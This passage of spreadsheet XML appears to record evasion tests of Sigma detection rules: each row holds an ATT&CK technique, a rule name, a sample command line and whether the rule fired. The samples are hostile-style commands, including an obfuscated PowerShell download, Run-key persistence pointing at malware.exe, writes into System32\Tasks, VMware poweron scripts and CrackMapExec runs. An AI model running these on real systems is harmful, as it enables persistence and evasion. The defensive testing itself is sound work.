        <v>1</v>
      </c>
      <c r="I743" s="44" t="n"/>
      <c r="J743" s="44" t="n"/>
      <c r="K743" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="744" ht="15.75" customHeight="1" s="42">
      <c r="A744" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B744" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_modification</t>
        </is>
      </c>
      <c r="C744" s="44" t="inlineStr">
        <is>
          <t>Service Security Descriptor Tampering Via Sc.EXE</t>
        </is>
      </c>
      <c r="D744" s="44" t="inlineStr">
        <is>
          <t>98c5aeef-32d5-492f-b174-64a691896d25</t>
        </is>
      </c>
      <c r="E744" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[WmiClass]'Win32_Service' | Where-Object {$_.Name -eq 'BenignService'} | Invoke-Method -Name SetSecurityDescriptor -ArgumentList ..."</t>
        </is>
      </c>
      <c r="F744" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G744" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H744" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I744" s="44" t="n"/>
      <c r="J744" s="44" t="n"/>
      <c r="K744" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="745" ht="15.75" customHeight="1" s="42">
      <c r="A745" s="44" t="inlineStr">
        <is>
          <t>t1219</t>
        </is>
      </c>
      <c r="B745" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_velociraptor_child_process</t>
        </is>
      </c>
      <c r="C745" s="44" t="inlineStr">
        <is>
          <t>Suspicious Velociraptor Child Process</t>
        </is>
      </c>
      <c r="D745" s="44" t="inlineStr">
        <is>
          <t>4bc90587-e6ca-4b41-be0b-ed4d04e4ed0c</t>
        </is>
      </c>
      <c r="E745" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$iwr_alias = 'I' + 'WR'; Invoke-Expression "$iwr_alias -Uri http://example.com/test.txt -OutFile C:\Temp\test.txt""</t>
        </is>
      </c>
      <c r="F745" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G745" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H745" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I745" s="44" t="n"/>
      <c r="J745" s="44" t="n"/>
      <c r="K745" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="746" ht="15.75" customHeight="1" s="42">
      <c r="A746" s="44" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B746" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_secedit_execution</t>
        </is>
      </c>
      <c r="C746" s="44" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit</t>
        </is>
      </c>
      <c r="D746" s="44" t="inlineStr">
        <is>
          <t>c2c76b77-32be-4d1f-82c9-7e544bdfe0eb</t>
        </is>
      </c>
      <c r="E746" s="44" t="inlineStr">
        <is>
          <t>secedit.exe "/configure" "/db" mytemplate.db</t>
        </is>
      </c>
      <c r="F746" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G746" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H746" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I746" s="44" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit (c2c76b77-32be-4d1f-82c9-7e544bdfe0eb)</t>
        </is>
      </c>
      <c r="J746" s="44" t="n"/>
      <c r="K746" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="747" ht="15.75" customHeight="1" s="42">
      <c r="A747" s="44" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B747" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_secedit_execution</t>
        </is>
      </c>
      <c r="C747" s="44" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit</t>
        </is>
      </c>
      <c r="D747" s="44" t="inlineStr">
        <is>
          <t>c2c76b77-32be-4d1f-82c9-7e544bdfe0eb</t>
        </is>
      </c>
      <c r="E747" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c secedit.exe /conf^igure /db mytemplate.db</t>
        </is>
      </c>
      <c r="F747" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G747" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H747" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I747" s="44" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit (c2c76b77-32be-4d1f-82c9-7e544bdfe0eb)</t>
        </is>
      </c>
      <c r="J747" s="44" t="n"/>
      <c r="K747" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="748" ht="15.75" customHeight="1" s="42">
      <c r="A748" s="44" t="inlineStr">
        <is>
          <t>t1562.002</t>
        </is>
      </c>
      <c r="B748" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_secedit_execution</t>
        </is>
      </c>
      <c r="C748" s="44" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit</t>
        </is>
      </c>
      <c r="D748" s="44" t="inlineStr">
        <is>
          <t>c2c76b77-32be-4d1f-82c9-7e544bdfe0eb</t>
        </is>
      </c>
      <c r="E748" s="44" t="inlineStr">
        <is>
          <t>secedit.exe /EXPORT /AREAS SECURITYPOLICY /CFG output_mysecpol.txt</t>
        </is>
      </c>
      <c r="F748" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G748" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H748" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I748" s="44" t="inlineStr">
        <is>
          <t>Potential Suspicious Activity Using SeCEdit (c2c76b77-32be-4d1f-82c9-7e544bdfe0eb)</t>
        </is>
      </c>
      <c r="J748" s="44" t="n"/>
      <c r="K748" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="749" ht="15.75" customHeight="1" s="42">
      <c r="A749" s="44" t="inlineStr">
        <is>
          <t>t1547.001</t>
        </is>
      </c>
      <c r="B749" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_autorun_registry_modified_via_wmic</t>
        </is>
      </c>
      <c r="C749" s="44" t="inlineStr">
        <is>
          <t>Suspicious Autorun Registry Modified via WMI</t>
        </is>
      </c>
      <c r="D749" s="44" t="inlineStr">
        <is>
          <t>c80e66d8-1780-48a9-b412-46663fd21ac0</t>
        </is>
      </c>
      <c r="E749" s="44" t="inlineStr">
        <is>
          <t>powershell.exe Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\\Run" /v Updater /t REG_SZ /d "C:\Windows\Temp\malware.exe" /f'</t>
        </is>
      </c>
      <c r="F749" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G749" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H749" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I749" s="44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749" s="44" t="n"/>
      <c r="K749" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="750" ht="15.75" customHeight="1" s="42">
      <c r="A750" s="44" t="inlineStr">
        <is>
          <t>t1547.001</t>
        </is>
      </c>
      <c r="B750" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_autorun_registry_modified_via_wmic</t>
        </is>
      </c>
      <c r="C750" s="44" t="inlineStr">
        <is>
          <t>Suspicious Autorun Registry Modified via WMI</t>
        </is>
      </c>
      <c r="D750" s="44" t="inlineStr">
        <is>
          <t>c80e66d8-1780-48a9-b412-46663fd21ac0</t>
        </is>
      </c>
      <c r="E750" s="44" t="inlineStr">
        <is>
          <t>powershell.exe Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'reg.exe "add" HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "C:\Windows\Temp\malware.exe" /f'</t>
        </is>
      </c>
      <c r="F750" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G750" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H750" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I750" s="44" t="inlineStr">
        <is>
          <t>Suspicious Script Execution From Temp Folder (a6a39bdb-935c-4f0a-ab77-35f4bbf44d33); Suspicious PowerShell Invocations - Specific - ProcessCreation (536e2947-3729-478c-9903-745aaffe60d2); Suspicious PowerShell Invocations - Specific - ProcessCreation (536e2947-3729-478c-9903-745aaffe60d2)</t>
        </is>
      </c>
      <c r="J750" s="44" t="n"/>
      <c r="K750" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="751" ht="15.75" customHeight="1" s="42">
      <c r="A751" s="44" t="inlineStr">
        <is>
          <t>t1547.001</t>
        </is>
      </c>
      <c r="B751" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_autorun_registry_modified_via_wmic</t>
        </is>
      </c>
      <c r="C751" s="44" t="inlineStr">
        <is>
          <t>Suspicious Autorun Registry Modified via WMI</t>
        </is>
      </c>
      <c r="D751" s="44" t="inlineStr">
        <is>
          <t>c80e66d8-1780-48a9-b412-46663fd21ac0</t>
        </is>
      </c>
      <c r="E751" s="44" t="inlineStr">
        <is>
          <t>powershell.exe Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "C:\Windows\.\Temp\malware.exe" /f'</t>
        </is>
      </c>
      <c r="F751" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G751" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H751" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I751" s="44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751" s="44" t="n"/>
      <c r="K751" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="752" ht="15.75" customHeight="1" s="42">
      <c r="A752" s="44" t="inlineStr">
        <is>
          <t>t1547.001</t>
        </is>
      </c>
      <c r="B752" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_autorun_registry_modified_via_wmic</t>
        </is>
      </c>
      <c r="C752" s="44" t="inlineStr">
        <is>
          <t>Suspicious Autorun Registry Modified via WMI</t>
        </is>
      </c>
      <c r="D752" s="44" t="inlineStr">
        <is>
          <t>c80e66d8-1780-48a9-b412-46663fd21ac0</t>
        </is>
      </c>
      <c r="E752" s="44" t="inlineStr">
        <is>
          <t>powershell.exe Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "C:/Windows/Temp/malware.exe" /f'</t>
        </is>
      </c>
      <c r="F752" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G752" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H752" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I752" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Invocations - Specific - ProcessCreation (536e2947-3729-478c-9903-745aaffe60d2); Suspicious PowerShell Invocations - Specific - ProcessCreation (536e2947-3729-478c-9903-745aaffe60d2)</t>
        </is>
      </c>
      <c r="J752" s="44" t="n"/>
      <c r="K752" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="753" ht="15.75" customHeight="1" s="42">
      <c r="A753" s="44" t="inlineStr">
        <is>
          <t>t1176.001</t>
        </is>
      </c>
      <c r="B753" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_chromium_load_extension</t>
        </is>
      </c>
      <c r="C753" s="44" t="inlineStr">
        <is>
          <t>Chromium Browser Instance Executed With Custom Extension</t>
        </is>
      </c>
      <c r="D753" s="44" t="inlineStr">
        <is>
          <t>88d6e60c-759d-4ac1-a447-c0f1466c2d21</t>
        </is>
      </c>
      <c r="E753" s="44" t="inlineStr">
        <is>
          <t>"C:\Program Files\Google\Chrome\Application\chrome.exe"	--load-extension="C:\Temp\test_extension"</t>
        </is>
      </c>
      <c r="F753" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G753" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H753" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I753" s="44" t="n"/>
      <c r="J753" s="44" t="n"/>
      <c r="K753" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="754" ht="15.75" customHeight="1" s="42">
      <c r="A754" s="44" t="inlineStr">
        <is>
          <t>t1574.001</t>
        </is>
      </c>
      <c r="B754" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_task_folder_evasion</t>
        </is>
      </c>
      <c r="C754" s="44" t="inlineStr">
        <is>
          <t>Tasks Folder Evasion</t>
        </is>
      </c>
      <c r="D754" s="44" t="inlineStr">
        <is>
          <t>cc4e02ba-9c06-48e2-b09e-2500cace9ae0</t>
        </is>
      </c>
      <c r="E754" s="44" t="inlineStr">
        <is>
          <t>copy /Y C:\Temp\test.txt C:\Windows\System32\Tasks\</t>
        </is>
      </c>
      <c r="F754" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G754" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H754" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I754" s="44" t="inlineStr">
        <is>
          <t>Tasks Folder Evasion (cc4e02ba-9c06-48e2-b09e-2500cace9ae0); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J754" s="44" t="n"/>
      <c r="K754" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="755" ht="15.75" customHeight="1" s="42">
      <c r="A755" s="44" t="inlineStr">
        <is>
          <t>t1574.001</t>
        </is>
      </c>
      <c r="B755" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_task_folder_evasion</t>
        </is>
      </c>
      <c r="C755" s="44" t="inlineStr">
        <is>
          <t>Tasks Folder Evasion</t>
        </is>
      </c>
      <c r="D755" s="44" t="inlineStr">
        <is>
          <t>cc4e02ba-9c06-48e2-b09e-2500cace9ae0</t>
        </is>
      </c>
      <c r="E755" s="44" t="inlineStr">
        <is>
          <t>copy C:\Temp\test.txt \Windows\System32\Tasks\test.txt</t>
        </is>
      </c>
      <c r="F755" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G755" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H755" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I755" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J755" s="44" t="n"/>
      <c r="K755" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="756" ht="15.75" customHeight="1" s="42">
      <c r="A756" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B756" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_vmware_toolbox_cmd_persistence</t>
        </is>
      </c>
      <c r="C756" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script</t>
        </is>
      </c>
      <c r="D756" s="44" t="inlineStr">
        <is>
          <t>7aa4e81a-a65c-4e10-9f81-b200eb229d7d</t>
        </is>
      </c>
      <c r="E756" s="44" t="inlineStr">
        <is>
          <t>VMwareToolBoxCmd.exe "script" set poweron "C:\path\script.bat"</t>
        </is>
      </c>
      <c r="F756" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G756" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H756" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I756" s="44" t="n"/>
      <c r="J756" s="44" t="n"/>
      <c r="K756" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="757" ht="15.75" customHeight="1" s="42">
      <c r="A757" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B757" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_vmware_toolbox_cmd_persistence</t>
        </is>
      </c>
      <c r="C757" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script</t>
        </is>
      </c>
      <c r="D757" s="44" t="inlineStr">
        <is>
          <t>7aa4e81a-a65c-4e10-9f81-b200eb229d7d</t>
        </is>
      </c>
      <c r="E757" s="44" t="inlineStr">
        <is>
          <t>VMwareToolBoxCmd.exe ^s^c^r^i^p^t set poweron "C:\path\script.bat"</t>
        </is>
      </c>
      <c r="F757" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G757" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H757" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I757" s="44" t="n"/>
      <c r="J757" s="44" t="n"/>
      <c r="K757" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="758" ht="15.75" customHeight="1" s="42">
      <c r="A758" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B758" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_vmware_toolbox_cmd_persistence</t>
        </is>
      </c>
      <c r="C758" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script</t>
        </is>
      </c>
      <c r="D758" s="44" t="inlineStr">
        <is>
          <t>7aa4e81a-a65c-4e10-9f81-b200eb229d7d</t>
        </is>
      </c>
      <c r="E758" s="44" t="inlineStr">
        <is>
          <t>VMwareToolBoxCmd.exe script set=poweron "C:\path\script.bat"</t>
        </is>
      </c>
      <c r="F758" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G758" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H758" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I758" s="44" t="n"/>
      <c r="J758" s="44" t="n"/>
      <c r="K758" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="759" ht="15.75" customHeight="1" s="42">
      <c r="A759" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B759" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_vmware_toolbox_cmd_persistence_susp</t>
        </is>
      </c>
      <c r="C759" s="44" t="inlineStr">
        <is>
          <t>Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script</t>
        </is>
      </c>
      <c r="D759" s="44" t="inlineStr">
        <is>
          <t>236d8e89-ed95-4789-a982-36f4643738ba</t>
        </is>
      </c>
      <c r="E759" s="44" t="inlineStr">
        <is>
          <t>VMwareToolBoxCmd.exe script set poweron C:\Windows\System32\Tasks\..\Tasks\malicious.bat</t>
        </is>
      </c>
      <c r="F759" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G759" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H759" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I759" s="44" t="n"/>
      <c r="J759" s="44" t="n"/>
      <c r="K759" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="760" ht="15.75" customHeight="1" s="42">
      <c r="A760" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B760" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_vmware_toolbox_cmd_persistence_susp</t>
        </is>
      </c>
      <c r="C760" s="44" t="inlineStr">
        <is>
          <t>Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script</t>
        </is>
      </c>
      <c r="D760" s="44" t="inlineStr">
        <is>
          <t>236d8e89-ed95-4789-a982-36f4643738ba</t>
        </is>
      </c>
      <c r="E760" s="44" t="inlineStr">
        <is>
          <t>VMwareToolBoxCmd.exe  script  set  poweron C:\PerfLogs\malicious.bat</t>
        </is>
      </c>
      <c r="F760" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G760" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H760" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I760" s="44" t="n"/>
      <c r="J760" s="44" t="n"/>
      <c r="K760" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="761" ht="15.75" customHeight="1" s="42">
      <c r="A761" s="44" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B761" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_vmware_toolbox_cmd_persistence_susp</t>
        </is>
      </c>
      <c r="C761" s="44" t="inlineStr">
        <is>
          <t>Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script</t>
        </is>
      </c>
      <c r="D761" s="44" t="inlineStr">
        <is>
          <t>236d8e89-ed95-4789-a982-36f4643738ba</t>
        </is>
      </c>
      <c r="E761" s="44" t="inlineStr">
        <is>
          <t>VMwareToolBoxCmd.exe ^s^c^r^i^p^t set poweron C:\Windows\Temp\malicious.bat</t>
        </is>
      </c>
      <c r="F761" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G761" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H761" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I761" s="44" t="n"/>
      <c r="J761" s="44" t="n"/>
      <c r="K761" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="762" ht="15.75" customHeight="1" s="42">
      <c r="A762" s="44" t="inlineStr">
        <is>
          <t>t1557.001</t>
        </is>
      </c>
      <c r="B762" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_kerberos_coercion_via_dns_spn_spoofing</t>
        </is>
      </c>
      <c r="C762" s="44" t="inlineStr">
        <is>
          <t>Attempts of Kerberos Coercion Via DNS SPN Spoofing</t>
        </is>
      </c>
      <c r="D762" s="44" t="inlineStr">
        <is>
          <t>0ed99dda-6a35-11ef-8c99-0242ac120002</t>
        </is>
      </c>
      <c r="E762" s="44" t="inlineStr">
        <is>
          <t>nslookup.exe "UWhRCAAAAABAAAAA"</t>
        </is>
      </c>
      <c r="F762" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G762" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H762" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I762" s="44" t="inlineStr">
        <is>
          <t>Attempts of Kerberos Coercion Via DNS SPN Spoofing (0ed99dda-6a35-11ef-8c99-0242ac120002); Attempts of Kerberos Coercion Via DNS SPN Spoofing (0ed99dda-6a35-11ef-8c99-0242ac120002)</t>
        </is>
      </c>
      <c r="J762" s="44" t="n"/>
      <c r="K762" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="763" ht="15.75" customHeight="1" s="42">
      <c r="A763" s="44" t="inlineStr">
        <is>
          <t>t1557.001</t>
        </is>
      </c>
      <c r="B763" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_kerberos_coercion_via_dns_spn_spoofing</t>
        </is>
      </c>
      <c r="C763" s="44" t="inlineStr">
        <is>
          <t>Attempts of Kerberos Coercion Via DNS SPN Spoofing</t>
        </is>
      </c>
      <c r="D763" s="44" t="inlineStr">
        <is>
          <t>0ed99dda-6a35-11ef-8c99-0242ac120002</t>
        </is>
      </c>
      <c r="E763" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c nslookup.exe UWhRC^AAAAABAAAAA</t>
        </is>
      </c>
      <c r="F763" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G763" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H763" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I763" s="44" t="inlineStr">
        <is>
          <t>Attempts of Kerberos Coercion Via DNS SPN Spoofing (0ed99dda-6a35-11ef-8c99-0242ac120002)</t>
        </is>
      </c>
      <c r="J763" s="44" t="n"/>
      <c r="K763" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="764" ht="15.75" customHeight="1" s="42">
      <c r="A764" s="44" t="inlineStr">
        <is>
          <t>t1557.001</t>
        </is>
      </c>
      <c r="B764" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_kerberos_coercion_via_dns_spn_spoofing</t>
        </is>
      </c>
      <c r="C764" s="44" t="inlineStr">
        <is>
          <t>Attempts of Kerberos Coercion Via DNS SPN Spoofing</t>
        </is>
      </c>
      <c r="D764" s="44" t="inlineStr">
        <is>
          <t>0ed99dda-6a35-11ef-8c99-0242ac120002</t>
        </is>
      </c>
      <c r="E764" s="44" t="inlineStr">
        <is>
          <t>nslookup.exe "UWhRCAAAAA""BAAAAA"</t>
        </is>
      </c>
      <c r="F764" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G764" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H764" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I764" s="44" t="inlineStr">
        <is>
          <t>Attempts of Kerberos Coercion Via DNS SPN Spoofing (0ed99dda-6a35-11ef-8c99-0242ac120002); Attempts of Kerberos Coercion Via DNS SPN Spoofing (0ed99dda-6a35-11ef-8c99-0242ac120002)</t>
        </is>
      </c>
      <c r="J764" s="44" t="n"/>
      <c r="K764" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="765" ht="15.75" customHeight="1" s="42">
      <c r="A765" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B765" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C765" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D765" s="44" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E765" s="44" t="inlineStr">
        <is>
          <t>C:\Tools\crackmapexec.exe	smb	192.0.2.10</t>
        </is>
      </c>
      <c r="F765" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G765" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H765" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I765" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution (42a993dd-bb3e-48c8-b372-4d6684c4106c)</t>
        </is>
      </c>
      <c r="J765" s="44" t="n"/>
      <c r="K765" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="766" ht="15.75" customHeight="1" s="42">
      <c r="A766" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B766" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C766" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D766" s="44" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E766" s="44" t="inlineStr">
        <is>
          <t>C:\Tools\crackmapexec.exe "smb" 192.0.2.10</t>
        </is>
      </c>
      <c r="F766" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G766" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H766" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I766" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution (42a993dd-bb3e-48c8-b372-4d6684c4106c)</t>
        </is>
      </c>
      <c r="J766" s="44" t="n"/>
      <c r="K766" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="767" ht="15.75" customHeight="1" s="42">
      <c r="A767" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B767" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C767" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D767" s="44" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E767" s="44" t="inlineStr">
        <is>
          <t>C:\Tools\crackmapexec.exe smb  192.0.2.10</t>
        </is>
      </c>
      <c r="F767" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G767" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H767" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I767" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution (42a993dd-bb3e-48c8-b372-4d6684c4106c)</t>
        </is>
      </c>
      <c r="J767" s="44" t="n"/>
      <c r="K767" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="768" ht="15.75" customHeight="1" s="42">
      <c r="A768" s="44" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B768" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution</t>
        </is>
      </c>
      <c r="C768" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution</t>
        </is>
      </c>
      <c r="D768" s="44" t="inlineStr">
        <is>
          <t>42a993dd-bb3e-48c8-b372-4d6684c4106c</t>
        </is>
      </c>
      <c r="E768" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c C:\Tools\crackmapexec.exe sm^b 192.0.2.10</t>
        </is>
      </c>
      <c r="F768" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G768" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H768" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I768" s="44" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution (42a993dd-bb3e-48c8-b372-4d6684c4106c)</t>
        </is>
      </c>
      <c r="J768" s="44" t="n"/>
      <c r="K768" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="769" ht="15.75" customHeight="1" s="42">
      <c r="A769" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B769" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_password_plaintext</t>
        </is>
      </c>
      <c r="C769" s="44" t="inlineStr">
        <is>
          <t>Password Provided In Command Line Of Net.EXE</t>
